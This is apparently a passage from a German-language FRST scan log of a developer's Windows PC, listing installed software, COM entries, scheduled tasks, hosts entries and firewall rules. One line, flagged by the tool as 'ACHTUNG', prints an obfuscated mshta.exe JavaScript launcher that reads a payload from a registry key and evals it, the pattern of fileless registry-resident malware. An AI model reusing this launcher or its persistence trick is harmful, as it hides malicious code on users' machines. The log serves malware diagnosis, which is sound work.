(HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.40.103 - Skype Technologies S.A.) 
SourceTree (HKLM-x32\...\{41228703-04A1-4670-BE4D-9C519977041E}) (Version: 1.9.10.0 - Atlassian) Hidden SourceTree (HKLM-x32\...\SourceTree 1.9.10.0) (Version: 1.9.10.0 - Atlassian) Steinberg Cubase 5 (HKLM-x32\...\{4A19D6AC-ADE0-4A07-80FF-9C9812C45557}) (Version: 5.1.0 - Steinberg Media Technologies GmbH) Steinberg Drum Loop Expansion 01 (HKLM-x32\...\{490BF87E-1F75-4453-BF55-9F540543A3CA}) (Version: 1.0.0.1 - Steinberg Media Technologies GmbH) Steinberg Groove Agent ONE Content (HKLM-x32\...\{BD86F1AC-B594-46E4-85DC-1258AC9E2232}) (Version: 1.0.0.003 - Steinberg Media Technologies GmbH) Steinberg HALionOne (HKLM-x32\...\{E70E7159-93B1-470D-9FBD-D8E9EF34B538}) (Version: 1.1.0.457 - Steinberg Media Technologies GmbH) Steinberg HALionOne Additional Content Set 01 (HKLM-x32\...\{F3AFD063-8BAD-485E-B641-E7F5A2C5AE71}) (Version: 1.0.0.001 - Steinberg Media Technologies GmbH) Steinberg HALionOne Expression Set (HKLM-x32\...\{E22AD5D3-EB60-4A8F-835C-6C10E369DCE2}) (Version: 1.0.1.0 - Steinberg Media Technologies GmbH) Steinberg HALionOne GM Drum Set (HKLM-x32\...\{AC997F93-0757-4ED4-A701-F40C2D654D09}) (Version: 1.0.1.457 - Steinberg Media Technologies GmbH) Steinberg HALionOne GM Set (HKLM-x32\...\{F057965A-D974-4C64-ADB1-4381CD4B8956}) (Version: 1.0.1.457 - Steinberg Media Technologies GmbH) Steinberg HALionOne Pro Set (HKLM-x32\...\{D82CDA0D-C182-42C8-8FF2-5649C98D6003}) (Version: 1.0.1.457 - Steinberg Media Technologies GmbH) Steinberg HALionOne Studio Drum Set (HKLM-x32\...\{865D9ED1-EAC2-436D-AFA7-0B750EB5AAAB}) (Version: 1.0.1.457 - Steinberg Media Technologies GmbH) Steinberg HALionOne Studio Set (HKLM-x32\...\{D23CBFDA-C46B-4920-BA70-FC7878A3F05A}) (Version: 1.0.1.457 - Steinberg Media Technologies GmbH) Steinberg LoopMash Content (HKLM-x32\...\{4D454CF8-12FD-464D-B57B-B46FE27B78BB}) (Version: 1.0.0.005 - Steinberg Media Technologies GmbH) Steinberg REVerence Content 01 (HKLM-x32\...\{532B917B-8235-4FA5-BE36-643A8BB053A5}) (Version: 1.0.0.006 - Steinberg Media 
Technologies GmbH) swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.95 - Synaptics Incorporated) Team Explorer for Microsoft Visual Studio 2015 Update 3.1 (HKLM-x32\...\{7A95671A-759E-3B83-B763-4289D1D24D73}) (Version: 14.102.25619 - Microsoft) Hidden TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.83369 - TeamViewer) Test Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{9EABBFE1-7EED-47D9-8FB8-21D7E4808057}) (Version: 14.0.23107 - Microsoft Corporation) Hidden TypeScript Power Tool (HKLM-x32\...\{465ACA24-B8D6-4FEC-A42D-9EFCB92CD560}) (Version: 1.8.34.0 - Microsoft Corporation) Hidden TypeScript Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{BA5762C7-D35F-4725-A4BD-525854127018}) (Version: 1.8.36.0 - Microsoft Corporation) Hidden Unity (HKLM-x32\...\Unity) (Version: 5.5.0f3 - Unity Technologies ApS) Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb) Update for (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation) Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft) Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM-x32\...\{90120000-0016-0407-0000-0000000FF1CE}_ENTERPRISE_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version: - Microsoft) Update für Microsoft Office Outlook 2007 Help (KB963677) (HKLM-x32\...\{90120000-001A-0407-0000-0000000FF1CE}_ENTERPRISE_{F6828576-6F79-470D-AB50-69D1BBADBD30}) (Version: - Microsoft) Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM-x32\...\{90120000-0018-0407-0000-0000000FF1CE}_ENTERPRISE_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version: - Microsoft) Update für Microsoft Office Word 2007 Help (KB963665) 
(HKLM-x32\...\{90120000-001B-0407-0000-0000000FF1CE}_ENTERPRISE_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version: - Microsoft) Validity WBF DDK (HKLM\...\{DB87BB79-2BDF-424E-A534-6F29C402AF46}) (Version: 4.5.246.0 - Validity Sensors, Inc.) Visual Paradigm CE 14.0 (HKLM\...\1106-5897-7327-6550) (Version: 14.0 - Visual Paradigm International Ltd.) Visual Studio 2015 Update 3 (KB3022398) (HKLM-x32\...\{7a68448b-9cf2-4049-bd73-5875f1aa7ba2}) (Version: 14.0.25420 - Microsoft Corporation) VS Update core components (HKLM-x32\...\{B2918D01-1D89-34D3-87EF-A28121BC6EB7}) (Version: 14.0.25431 - Microsoft Corporation) Hidden vs_update3notification (HKLM-x32\...\{AB3DF932-C990-34D4-BF43-970F760DA3CD}) (Version: 14.0.25431 - Microsoft Corporation) Hidden WCF Data Services 5.6.4 Runtime (HKLM-x32\...\{DB85E7BD-B2DD-43D4-B3C0-23D7B527B597}) (Version: 5.6.62175.4 - Microsoft Corporation) Hidden WCF Data Services Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{0A3B508E-5638-4471-BCC9-954E1868CB86}) (Version: 5.6.62175.4 - Microsoft Corporation) Hidden Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation) XAMPP (HKLM-x32\...\xampp) (Version: 7.1.7-0 - Bitnami) yEd Graph Editor 3.17 (HKLM\...\3309-7404-0599-8908) (Version: 3.17 - yWorks GmbH) Zoom (HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\...\ZoomUMX) (Version: 4.0 - Zoom Video Communications, Inc.) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) CustomCLSID: HKU\S-1-5-21-1772142865-3804567698-3626976838-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\xxxxxx\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.) 
CustomCLSID: HKU\S-1-5-21-1772142865-3804567698-3626976838-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\xxxxxx\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Keine Datei CustomCLSID: HKU\S-1-5-21-1772142865-3804567698-3626976838-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\xxxxxx\AppData\Local\Citrix\GoToMeeting\4431\G2MOutlookAddin64.dll => Keine Datei CustomCLSID: HKU\S-1-5-21-1772142865-3804567698-3626976838-1001_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\xxxxxx\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Keine Datei CustomCLSID: HKU\S-1-5-21-1772142865-3804567698-3626976838-1001_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\xxxxxx\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Keine Datei CustomCLSID: HKU\S-1-5-21-1772142865-3804567698-3626976838-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\xxxxxx\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.) 
HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\Software\Classes\ngil: "C:\Windows\system32\mshta.exe" "javascript:hB3OZ3z="Ftp";FA1=new ActiveXObject("WScript.Shell");xLPXI7M="DTrcITN1";NtE6O7=FA1.RegRead("HKCU\\software\\cqcyivd\\uonp");r93rTBHt="w";eval(NtE6O7);Gc9ie7Bw="0oBTA0g";" <==== ACHTUNG
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Keine Datei
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\projects\Notepad++\NppShell_06.dll [2017-05-18] ()
ContextMenuHandlers1: [BtSendToMenuEx] -> {CF24E6B8-F148-4BCB-9108-ADF313966E80} => C:\Program Files (x86)\REALTEK\Realtek Bluetooth\DevMenuExt.dll [2014-01-06] (Realtek Semiconductor Corporation)
ContextMenuHandlers1: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => C:\Program Files (x86)\Common Files\CyberLink\ShellExtComponent\CLVDShellExt.dll [2014-02-21] (Cyberlink)
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers1: [LockHunterShellExt] -> {0BB27CDA-7029-4C0E-9C56-D922B229F0EB} => C:\projects\LockHunter\LHShellExt64.dll [2013-11-21] (Crystal Rich Ltd)
ContextMenuHandlers2: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => C:\Program Files (x86)\Common Files\CyberLink\ShellExtComponent\CLVDShellExt.dll [2014-02-21] (Cyberlink)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers2: [LockHunterShellExt] -> {0BB27CDA-7029-4C0E-9C56-D922B229F0EB} => C:\projects\LockHunter\LHShellExt64.dll [2013-11-21] (Crystal Rich Ltd)
ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Keine Datei
ContextMenuHandlers3: [UnlockerShellExtension] -> {DDE4BEEB-DDE6-48fd-8EB5-035C09923F83} => C:\projects\Unlocker\UnlockerCOM.dll [2010-07-15] ()
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers4: [LockHunterShellExt] -> {0BB27CDA-7029-4C0E-9C56-D922B229F0EB} => C:\projects\LockHunter\LHShellExt64.dll [2013-11-21] (Crystal Rich Ltd)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\atiacmxx.dll -> Keine Datei
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers6: [UnlockerShellExtension] -> {DDE4BEEB-DDE6-48fd-8EB5-035C09923F83} => C:\projects\Unlocker\UnlockerCOM.dll [2010-07-15] ()

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {076A7066-A872-46C1-832C-4DBBF8D29E38} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1772142865-3804567698-3626976838-1001Core => C:\Users\xxxxxx\AppData\Local\Google\Update\GoogleUpdate.exe [2016-09-15] (Google Inc.)
Task: {1D9C07AA-F0A0-42CB-98B9-AD305816C1AD} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-07-13] (AVAST Software)
Task: {23039313-3DA1-484A-BE34-13F3DF78108E} - System32\Tasks\{FDBDB83B-E748-4D3E-B356-89315C46DCBE} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\BlueStacks\HD-RuntimeUninstaller.exe"
Task: {274CB371-F96F-47BB-BF20-4EC8A5420E84} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1772142865-3804567698-3626976838-1001UA => C:\Users\xxxxxx\AppData\Local\Google\Update\GoogleUpdate.exe [2016-09-15] (Google Inc.)
Task: {36D6588B-2125-4D72-98FC-ABB1D7534759} - System32\Tasks\HPCeeScheduleForxxxxxx => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15] (Hewlett-Packard)
Task: {7FD7F98F-F8C0-40DB-9C22-B7339189F45F} - System32\Tasks\G2MUploadTask-S-1-5-21-1772142865-3804567698-3626976838-1001 => C:\Users\xxxxxx\AppData\Local\GoToMeeting\7716\g2mupload.exe [2017-10-01] (LogMeIn, Inc.)
Task: {8E2571BC-A167-4093-A1CD-D33DD795FB67} - System32\Tasks\Microsoft\VisualStudio\VSIX Auto Update 14 => C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\VSIXAutoUpdate.exe [2016-06-20] (Microsoft Corporation)
Task: {9598DF6A-45F9-4FD9-825A-1FCCDFE95310} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFReport.exe [2016-02-18] (Hewlett-Packard)
Task: {9B886B7E-F3C7-4895-B83B-57CF6A9B987A} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {9CA35078-803B-4509-B0C3-EEE63BC51B50} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2013-11-01] (Hewlett-Packard Development Company, L.P.)
Task: {9F249450-92B1-4DBA-88DE-121F1A4B132F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-01-13] (Hewlett-Packard Company)
Task: {9F410326-0B97-4E78-9C42-A639922DF374} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated)
Task: {AAF8D936-E94A-48AE-B325-C308531AE1AB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-05-17] (Google Inc.)
Task: {B166EAB8-E139-40C4-AC68-0047413ECABD} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-09-13] (Adobe Systems Incorporated)
Task: {B515325D-3D91-4BDA-B4E6-A38EF277CFCA} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe [2014-03-07] (CyberLink Corp.)
Task: {B8159701-6B6F-426F-941A-DCDF113DCF5B} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2013-03-12] (CyberLink Corp.)
Task: {C6C6200B-50DC-42E4-8C24-8C12A55928C7} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-01-13] (Hewlett-Packard Company)
Task: {CE8FA03A-10FE-4BF2-BB2B-48648CD7B3E1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2017-08-01] (HP Inc.)
Task: {D403547D-5BB3-4FCC-8727-9400B9257F1B} - System32\Tasks\G2MUpdateTask-S-1-5-21-1772142865-3804567698-3626976838-1001 => C:\Users\xxxxxx\AppData\Local\GoToMeeting\7716\g2mupdate.exe [2017-10-01] (LogMeIn, Inc.)
Task: {DC483E08-E9BC-4674-9AB5-67837DA2DF3D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {DF5369A0-C4F0-4B56-96CA-506A4CFE04F7} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-05-17] (Google Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-1772142865-3804567698-3626976838-1001.job => C:\Users\xxxxxx\AppData\Local\GoToMeeting\7716\g2mupdate.exe
Task: C:\Windows\Tasks\G2MUploadTask-S-1-5-21-1772142865-3804567698-3626976838-1001.job => C:\Users\xxxxxx\AppData\Local\GoToMeeting\7716\g2mupload.exe
Task: C:\Windows\Tasks\HPCeeScheduleForxxxxxx.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
Shortcut: C:\Users\xxxxxx\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ruby 2.1.7-p400\Interactive Ruby.lnk -> C:\projects\Ruby21\bin\irb.bat ()
ShortcutWithArgument: C:\Users\xxxxxx\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ruby 2.1.7-p400\Start Command Prompt with Ruby.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /E:ON /K C:\projects\Ruby21\bin\setrbvars.bat
ShortcutWithArgument: C:\Users\xxxxxx\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js command prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /k "C:\projects\nodejs\nodevars.bat"

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-03-13 16:11 - 2017-03-13 16:11 - 000052392 _____ () C:\projects\FileZilla FTP Client\fzshellext_64.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "UseAlternateShell"="1"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

==================== Hosts Inhalt: ==========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2017-09-20 22:41 - 000001431 _____ C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 stockparser
127.0.0.1 code-sales.localhost
127.0.0.1 joomla360.localhost
127.0.0.1 dani.localhost
127.0.0.1 three83.localhost
127.0.0.1 threemotion.localhost
127.0.0.1 threeegoshooter.localhost
127.0.0.1 phalcon-devtools.localhost
127.0.0.1 phalcon.localhost
127.0.0.1 cakephp334.localhost
127.0.0.1 Pruefung2.localhost
127.0.0.1 xmlrpc.localhost
127.0.0.1 laraveloctobercms.localhost
127.0.0.1 laravelbootstrapcms.localhost
127.0.0.1 laravelitecms.localhost
127.0.0.1 typo3-876
127.0.0.1 typo3-7621
127.0.0.1 node-cluster-test

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1772142865-3804567698-3626976838-1001\Control Panel\Desktop\\Wallpaper ->
DNS Servers: Datenträger ist nicht mit dem Internet verbunden.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

MSCONFIG\Services: BstHdAndroidSvc => 3
MSCONFIG\Services: BstHdLogRotatorSvc => 3
MSCONFIG\Services: BstHdUpdaterSvc => 3
MSCONFIG\Services: MBAMService => 3
MSCONFIG\Services: omniserv => 2
MSCONFIG\Services: OracleMTSRecoveryService => 3
MSCONFIG\Services: OracleServiceXE => 3
MSCONFIG\Services: OracleXEClrAgent => 3
MSCONFIG\Services: OracleXETNSListener => 3
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: TermService => 3
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: BtServer => "C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTServer.exe"
MSCONFIG\startupreg: OPBHOBroker => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
MSCONFIG\startupreg: OPBHOBrokerDesktop => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
MSCONFIG\startupreg: SimplePass => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe /hideui

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe FirewallRules: [{0D74785C-9042-4268-85E4-0E4640BA74F1}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe FirewallRules: [{38C2B67E-D825-4E68-AF5C-2F47F356AFC8}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe FirewallRules: [{917ADC9C-A01D-4DC5-AA2A-B5C40AAB24AC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{0E82FA8E-4762-4A02-AEAF-0998D098D0FA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [TCP Query User{0B39F97E-B129-41E4-9B3F-81EDE71637E4}C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe] => (Allow) C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe FirewallRules: [UDP Query User{69CB93C2-4F1F-4A01-83E3-622EE9F0E3E6}C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe] => (Allow) C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe FirewallRules: [TCP Query User{DCB0945B-D39E-4432-A443-7F0D5F458C56}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe FirewallRules: [UDP Query User{F1050AA3-6575-47F5-9AB7-CC6CD3C71816}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe FirewallRules: [TCP Query User{DB6A02D7-2B23-4F76-8235-35087FA42CCD}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe FirewallRules: [UDP Query User{334ACB60-86F4-4FB8-8B12-C8DD735A3E49}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe FirewallRules: [TCP Query User{4D04777F-08EF-4C09-A005-D0C2C3DA0325}C:\program files\java\jre1.8.0_45\bin\javaw.exe] 
=> (Allow) C:\program files\java\jre1.8.0_45\bin\javaw.exe FirewallRules: [UDP Query User{88425DAE-63DB-4FED-8539-54D255297B6C}C:\program files\java\jre1.8.0_45\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_45\bin\javaw.exe FirewallRules: [TCP Query User{BEF979CA-B16E-48AD-8E3D-597897A8F344}C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe] => (Allow) C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe FirewallRules: [UDP Query User{1FFEF5E0-1C54-4335-80EE-5A433F5EB54F}C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe] => (Allow) C:\projects\eclipse-jee-luna-sr2-win32-x86_64\eclipse\eclipse.exe FirewallRules: [{9D61FC5D-FF16-4E5E-B269-B5300EBADBF3}] => (Block) C:\projects\Steinberg\Cubase 5\Cubase5.exe FirewallRules: [{60245654-3571-4401-A1B8-CD88653A3ACC}] => (Allow) %SystemDrive%\projects\FileZilla FTP Client\filezilla.exe FirewallRules: [{31BED353-A190-4D1E-895B-ECDFCB58F7B6}] => (Allow) %SystemDrive%\projects\FileZilla FTP Client\filezilla.exe FirewallRules: [{C451BEF0-3594-40E7-BB78-DF7C62E4CADD}] => (Allow) C:\projects\TeamViewer\TeamViewer.exe FirewallRules: [{43E93339-5B15-4B35-B6A0-0B8ABB3C55ED}] => (Allow) C:\projects\TeamViewer\TeamViewer.exe FirewallRules: [{C4B59E77-A785-4927-9195-C7E3568F729A}] => (Allow) C:\projects\TeamViewer\TeamViewer_Service.exe FirewallRules: [{4111D1E9-E2C0-4805-9101-21E38F0FA745}] => (Allow) C:\projects\TeamViewer\TeamViewer_Service.exe FirewallRules: [TCP Query User{6D04756B-5CAB-4DF8-AC07-DBE761729EB1}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe FirewallRules: [UDP Query User{B649FF7D-7052-4AAF-ADC6-C8EA16F2684D}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe FirewallRules: [TCP Query User{BD3CDD32-BCBA-44EE-A7E5-7D31FCA5B4ED}C:\projects\sqldeveloper\sqldeveloper\bin\sqldeveloper64w.exe] => (Allow) C:\projects\sqldeveloper\sqldeveloper\bin\sqldeveloper64w.exe FirewallRules: [UDP Query 
User{FA11DB57-5E7F-4BB6-B743-5B693DB545E5}C:\projects\sqldeveloper\sqldeveloper\bin\sqldeveloper64w.exe] => (Allow) C:\projects\sqldeveloper\sqldeveloper\bin\sqldeveloper64w.exe FirewallRules: [TCP Query User{8D8E3DE7-2161-40E7-BF2D-DCCC82D40858}C:\users\xxxxxx\downloads\iedriverserver_x64_2.46.0\iedriverserver.exe] => (Allow) C:\users\xxxxxx\downloads\iedriverserver_x64_2.46.0\iedriverserver.exe FirewallRules: [UDP Query User{CDAFD342-4EDD-4691-BBAF-339335E0ED7B}C:\users\xxxxxx\downloads\iedriverserver_x64_2.46.0\iedriverserver.exe] => (Allow) C:\users\xxxxxx\downloads\iedriverserver_x64_2.46.0\iedriverserver.exe FirewallRules: [TCP Query User{9C38E026-44F6-4033-A31C-AC8F8272FB16}C:\program files\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_51\bin\javaw.exe FirewallRules: [UDP Query User{ED81DBD9-97DB-4BB5-A717-9ABC85181065}C:\program files\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_51\bin\javaw.exe FirewallRules: [{55417A5A-9FD1-41B6-B6DD-58D86B564918}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe FirewallRules: [{FEF75C5F-E058-499D-BA6F-98F229B88242}] => (Allow) LPort=2869 FirewallRules: [{29A5991A-46CD-4FA4-9604-65B111B6EB76}] => (Allow) LPort=1900 FirewallRules: [TCP Query User{3A971807-2F0E-4891-858F-FA70E1A46F15}C:\program files\java\jdk1.8.0_45\bin\jconsole.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\jconsole.exe FirewallRules: [UDP 